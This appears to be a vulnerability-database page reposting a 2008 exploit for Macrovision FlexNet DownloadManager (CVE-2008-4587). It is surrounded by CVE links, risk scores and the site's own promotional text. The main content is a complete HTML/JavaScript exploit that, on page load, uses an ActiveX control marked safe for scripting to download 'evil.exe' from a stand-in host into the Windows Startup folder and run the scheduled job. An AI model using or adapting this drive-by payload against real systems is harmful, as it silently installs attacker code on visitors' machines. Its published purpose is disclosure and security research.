Lucene search
+L

Macrovision FlexNet DownloadManager - Insecure Methods

🗓️ 14 Jan 2008 00:00:00Reported by ElazarType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

Macrovision FlexNet DownloadManager Insecure Methods Exploit. Safe for Scripting. Tested on Windows XP SP2 English, IE6, ISDM.exe version 6.1.100.6137

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2008-4587
15 Oct 200822:45
attackerkb
cve
CVE
CVE-2008-4587
15 Oct 200822:00
cve
cvelist
Cvelist
CVE-2008-4587
15 Oct 200822:00
cvelist
nvd
NVD
CVE-2008-4587
15 Oct 200822:45
nvd
prion
Prion
Design/Logic Flaw
15 Oct 200822:45
prion
<!--
Macrovision FlexNet DownloadManager Insecure Methods Exploit
Implemented Categories:
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372
-->
<html>
 <head>
  <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title>
  <script language="JavaScript" defer>
    function Check() {

	var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");

	mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe");
	mJob.SetPriority(0);
	mJob.SetNotifyFlags(2);
	mJob.ScheduleInterval = 2;

	obj.RunScheduledJobs();


    }

   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jan 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.10507
48